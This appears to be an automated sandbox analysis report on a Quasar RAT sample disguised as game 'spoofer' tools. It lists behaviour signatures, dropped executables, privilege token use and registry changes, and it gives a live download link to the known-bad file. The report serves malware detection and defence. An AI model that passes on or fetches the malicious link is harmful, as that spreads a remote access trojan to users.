Analysis Overview
Threat Level: Known bad
The file http://gofile.io/d/Vw475K was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
Quasar family
Quasar payload
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
Looks up external IP address via web service
UPX packed file
Enumerates processes with tasklist
Browser Information Discovery
Uses Task Scheduler COM API
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Scheduled Task/Job: Scheduled Task
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-30 00:21
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-30 00:21
Reported
2024-10-30 00:27
Platform
win10v2004-20241007-en
Max time kernel
299s
Max time network
301s
Command Line
Signatures
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Spoofers\Cleaner.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Spoofers\Cleaner.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Spoofers\Cleaner.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Spoofers\Cleaner.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Spoofers\Cleaner.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Spoofers\Cleaner.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Spoofers\PermWoofer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Spoofers\PermWoofer.exe | N/A |
Loads dropped DLL
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 = 5a003100000000005d5941be100053706f6f666572730000420009000400efbe5e59d5025e59d8022e0000005507000000001a0000000000000000000000000000004c272a01530070006f006f006600650072007300000018000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\NodeSlot = "5" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 00000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000388ddce19718db01256ef5219d18db01244f8af2612adb0114000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
